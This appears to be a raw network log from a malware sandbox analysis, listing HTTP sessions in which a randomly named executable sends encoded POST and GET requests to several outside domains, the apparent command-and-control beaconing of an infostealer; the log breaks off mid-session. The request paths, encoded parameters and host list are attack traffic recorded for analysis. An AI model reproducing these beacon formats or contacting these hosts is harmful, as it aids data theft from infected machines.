                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ESgTqOqO7qsVfXIKGo4mnKaXjLOKA9byi0726FEznFAU/jC+Ekk2Ywy03VeqehfiT6lvaOtHdNAVpWUx9cexhw==
                                              set-cookie: parking_session=6973e5e4-a21a-4873-91da-5ae22c10d7ed; expires=Mon, 01 Jul 2024 14:33:02 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ESgTqOqO7qsVfXIKGo4mnKaXjLOKA9byi0726FEznFAU/jC+Ekk2Ywy03VeqehfiT6lvaOtHdNAVpWUx9cexhw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:18:02.193368912 CEST  971                IN
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk3M2U1ZTQtYTIxYS00ODczLTkxZGEtNWFlMjJjMTBkN2VkIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              29          192.168.2.5  49759        45.207.12.95    80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:07.346514940 CEST  770                OUT        POST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=qTHhMnHSt1Fk7n3Xiiw6DunSGvhp1IildHjJc3sEAqwhhLvvOJB3ASbSaWQ7R45yGYnrWl5SyK+ksrPBQHtNtFOGUpKv0x0usvFA/qAzXvht/HINfwOin0rB87dl9tM38NfZRxm2WM+CBJtJRvshDOnHhq+7Jjc2tTUWBeWg02VTxYeAgO393CXwJ9TUOawpuwBrRhw=
                                              Jul 1, 2024 16:18:08.266159058 CEST  492                IN         HTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:07 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              30          192.168.2.5  49760        45.207.12.95    80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:09.886069059 CEST  790                OUT        POST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=qTHhMnHSt1Fkp0vXkBI6FOnVJPhpsYjsdHvJc1AqBYkhhvjvPIB3DSbSCmQ+Mo5pGfvJWkFSyK6ksujBQ0FM/lOEN5Ktwx0usvFA/q8VXv5t/2YNQxOtm0rC1bdlvdMz8NfrR1GMWK6CBIdJR74+UenBvK/+YChmzCYXMdyo3kRl9Ozq6s/Vki7IZubjfqRA0TRbP2kR9hFkVc2heSshoKEItx3A
                                              Jul 1, 2024 16:18:10.806495905 CEST  492                IN         HTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:10 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              31          192.168.2.5  49761        45.207.12.95    80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:12.417527914 CEST  1807               OUT        POST /dy54/ HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.203av.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.203av.com/dy54/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:13.333486080 CEST  492                IN         HTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:12 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              32          192.168.2.5  49762        45.207.12.95    80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:14.951992989 CEST  524                OUT        GET /dy54/?3hkl=slNhbLXpBjO8vl&4dV43tA=nRvBPTzlzGF4n3rt1QttF4nrN+JQ8KTHZyrUcXxxKI8o38P7J7J9FRPNIVc1TZhiGrLUOXxy1Ju1j9DdTlskr3z+VILb9gUTk9d2pc0Ee/hjvnETVBSGl3uD2JlRjMFEvQ== HTTP/1.1
                                              Host: www.203av.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:15.845623016 CEST  492                IN         HTTP/1.1 404 Not Found
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 01 Jul 2024 14:18:14 GMT
                                              Connection: close
                                              Content-Length: 315
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              33          192.168.2.5  49763        81.95.96.29     80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:21.028650999 CEST  794                OUT        POST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:21.713047981 CEST  1236               IN         HTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:21 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              34          192.168.2.5  49764        81.95.96.29     80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:23.559108973 CEST  814                OUT        POST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:24.248047113 CEST  1236               IN         HTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:24 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              35          192.168.2.5  49765        81.95.96.29     80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:26.091989994 CEST  1831               OUT        POST /vi6c/ HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.hydrogenmovie.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.hydrogenmovie.com/vi6c/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:26.795411110 CEST  1236               IN         HTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:26 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Content-Encoding: gzip
                                              Content-Length: 4981
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              36          192.168.2.5  49766        81.95.96.29     80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:28.632405043 CEST  532                OUT        GET /vi6c/?4dV43tA=bcf+LDcyoYCm+QyU3/UN8JBlUcMDsPN1iNWsx7umrkQm3W+qfOHyOayxGzxcStXTe9ogwFYflhpGlkCNjFINeirDlZuuOL3Enw+3v27XAzPfiFhmkrPFAnkPRuNZJaNv/Q==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.hydrogenmovie.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:29.343560934 CEST  1236               IN         HTTP/1.1 200 OK
                                              Date: Mon, 01 Jul 2024 14:18:29 GMT
                                              Server: Apache
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: 59a4<html><head><base href="/"><meta charset="utf-8"><title>ACTIVE 24, s.r.o.</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="Keywords" content=""><meta name="Description" content="ACTIVE 24, s.r.o."><meta name="Author" content="ACTIVE 24, s.r.o."><meta name="Owner" content="ACTIVE 24, s.r.o. ">... favicon start --><link rel="apple-touch-icon" sizes="57x57" href="https://gui.active24.cz/img/icon/a24-apple-favicon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="https://gui.active24.cz/img/icon/a24-apple-favicon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="https://gui.active24.cz/img/icon/a24-apple-favicon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="https://gui.active24.cz/img/icon/a24-apple-favicon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="https://gui.active24.cz/img/icon/a24-apple-favicon-114x114.png"><link rel="apple-touch-icon" sizes="120 [TRUNCATED]
                                              Jul 1, 2024 16:18:29.343678951 CEST1236INData Raw: 20 7b 0d 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 67 75 69 2e 61 63 74 69 76 65 32 34 2e 63 7a 2f 69 6d 67 2f 77 65 62 6d 61 69 6c 5f 69 6b 6f 6e 79 5f 76 6c 61 6a 6b 79 2e 70 6e 67 29 20 2d 31 35 70 78
                                              Data Ascii: {background: url(https://gui.active24.cz/img/webmail_ikony_vlajky.png) -15px -238px no-repeat}.dropdown-toggle::after {height: 100%;right: 10px;top: 45%;position: absolute;content: "";border-top: .
                                              Jul 1, 2024 16:18:29.343893051 CEST1236INData Raw: 39 30 70 78 3b 0d 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 35 70 78 3b 0d 0a 09 09 7d 0d 0a 09 3c 2f 73 74 79 6c 65 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 68 70 20 68 70 31 35 22 3e 0d
                                              Data Ascii: 90px;margin-top: -45px;}</style></head><body class="hp hp15"><header class="header"><div class="header__container"><a class="header__logo" href="https://www.active24.com" role="button"></a><div class="heade
                                              Jul 1, 2024 16:18:29.343904972 CEST1236INData Raw: 6c 69 73 68 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 6c 61 6e 67 2d 69 74 65 6d 20 6c 61 6e 67 2d 65 73 22 3e
                                              Data Ascii: lish</a></span></button><button class="lang-item lang-es"><span><a href="/DOMAIN/es/index.php">Espaol</a></span></button><button class="lang-item lang-nl"><span><a hre
                                              Jul 1, 2024 16:18:29.343916893 CEST1024INData Raw: 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 63 74 69 76 65 32 34 2e 63 6f 6d 22 3e 41 43 54 49 56 45 20 32 34 3c 2f 61 3e 2e 3c 2f 70 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69
                                              Data Ascii: "https://www.active24.com">ACTIVE 24</a>.</p></div></div></div></div><div class="block__illu overflow-hidden"><div class="block__image" id="image"><img alt=""src="https://gui.active24.cz/img/default
                                              Jul 1, 2024 16:18:29.343928099 CEST1236INData Raw: 64 6f 6d 61 69 6e 2f 61 76 61 69 6c 61 62 69 6c 69 74 79 2f 6c 69 73 74 22 0d 0a 09 09 09 09 09 63 6c 61 73 73 3d 22 69 6e 6c 69 6e 65 2d 66 6f 72 6d 20 69 6e 73 69 74 65 2d 63 6f 6e 74 72 6f 6c 73 2d 63 6f 6e 74 61 69 6e 65 72 20 6d 62 2d 30 22
                                              Data Ascii: domain/availability/list"class="inline-form insite-controls-container mb-0"method="GET"novalidate><div class="inline-form__item inline-form__item--label"><h2 class="insite-only inline-form__title">REGISTRA
                                              Jul 1, 2024 16:18:29.348726034 CEST1236INData Raw: 76 20 63 6c 61 73 73 3d 22 77 72 61 70 2d 6c 69 73 74 20 76 2d 73 70 61 63 65 2d 2d 62 6f 74 74 6f 6d 20 72 6f 77 2d 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 0d 0a 09 09 09
                                              Data Ascii: v class="wrap-list v-space--bottom row-flex justify-content-center"><div class="wrap-list__item"><div class="box box--tight h-100"><div class="box__container h-flex"><div class="text-center v-


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              37 | 192.168.2.5 | 49767 | 103.224.182.246 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:35.366411924 CEST | 773 | OUT | POST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=T8RHcsuNY1SnqUH3DQS+wz9WPRy8/awbk5bvBbt2kigjiVE6SMPF5Au3GGylkTldWFsQN5gTMRdvrElT3xkvXtENnvB/om5OuD6PxULJH2SPXh32kumCubgL0lqMpmmIpQ5SFzxOEYY1q/G+jgvooF2cFDRa7KZoB0FJn0mHpmYT3pyBcoVcJtKAK62PKo3AlObvN6I=
                                              Jul 1, 2024 16:18:35.999718904 CEST | 333 | IN | HTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:35 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843515.1468331; expires=Thu, 29-Jun-2034 14:18:35 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-3502-bc81-6d3bd567f235
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              38 | 192.168.2.5 | 49768 | 103.224.182.246 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:37.901422977 CEST | 793 | OUT | POST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=T8RHcsuNY1Snp0X3MT6+4z9ZWRy816wfk5HvBaZmkQUji006RO3F6Au3OmyspzkRWFRvN4MTMR5vrFVT3CMsW9EDzfB5lG5OuD6PxUusHy2PURH2nLSBn7gM3lqM42mMpQ50FytoEaQ1q7O+kxvvyV2aBDQG/bk6LE5JmWyF6W00//frGKd0aNm4ap+4bYWp/tLfTtdVti1fW7RelLWXHNYLQ5o5
                                              Jul 1, 2024 16:18:38.533639908 CEST | 333 | IN | HTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:38 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843518.3662828; expires=Thu, 29-Jun-2034 14:18:38 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-38ab-b3fe-5f182fd55e69
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              39 | 192.168.2.5 | 49769 | 103.224.182.246 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:40.486275911 CEST | 1810 | OUT | POST /n983/ HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.atmpla.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.atmpla.net/n983/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:41.086306095 CEST | 333 | IN | HTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:40 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843520.2506297; expires=Thu, 29-Jun-2034 14:18:40 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?sub1=20240702-0018-40fd-b0c0-de8fa4c780cd
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              40 | 192.168.2.5 | 49770 | 103.224.182.246 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:43.039994001 CEST | 525 | OUT | GET /n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A== HTTP/1.1
                                              Host: www.atmpla.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:43.638958931 CEST | 494 | IN | HTTP/1.1 302 Found
                                              date: Mon, 01 Jul 2024 14:18:43 GMT
                                              server: Apache
                                              set-cookie: __tad=1719843523.8302071; expires=Thu, 29-Jun-2034 14:18:43 GMT; Max-Age=315360000
                                              location: http://ww16.atmpla.net/n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e+5nfbuNDjer0F2gZArKywdTCxWjyYobv/bJcL0KsTg4lVUyb9D57z7xFmyHzStdVmhrGKgxJydatVMh3gIVfbA1nNcelGxUr0Cqn1CeETaIIhfK6rSIprtv6DqA0Tv84A==&sub1=20240702-0018-43fc-840f-b1c56d53c9de
                                              content-length: 2
                                              content-type: text/html; charset=UTF-8
                                              connection: close
                                              Data Raw: 0a 0a
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              41 | 192.168.2.5 | 49771 | 72.52.179.174 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:48.836009979 CEST | 803 | OUT | POST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.europedriveguide.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.europedriveguide.com/2pcd/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=gKvW0owSgHRAjWlnCmOskFoU29nuMWDIZFhQKrhPYqm7foougnEMxDGpcSiEKcDEwfmnFkj8eldJR3mFyEMBacnySGyi5gGGHly/+7cS8INcKJnnIZvyTsCOlhv7OCzVRr+DyB8R+chFCmJ8bwS2ZmJAQeiKbFRSmw/Qv2/6GjpbIaIOLUwxr1tpkaBkHDWoaaXrXZk=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              42 | 192.168.2.5 | 49772 | 72.52.179.174 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:18:51.373471022 CEST | 823 | OUT | POST /2pcd/ HTTP/1.1
                                              Host: www.europedriveguide.com
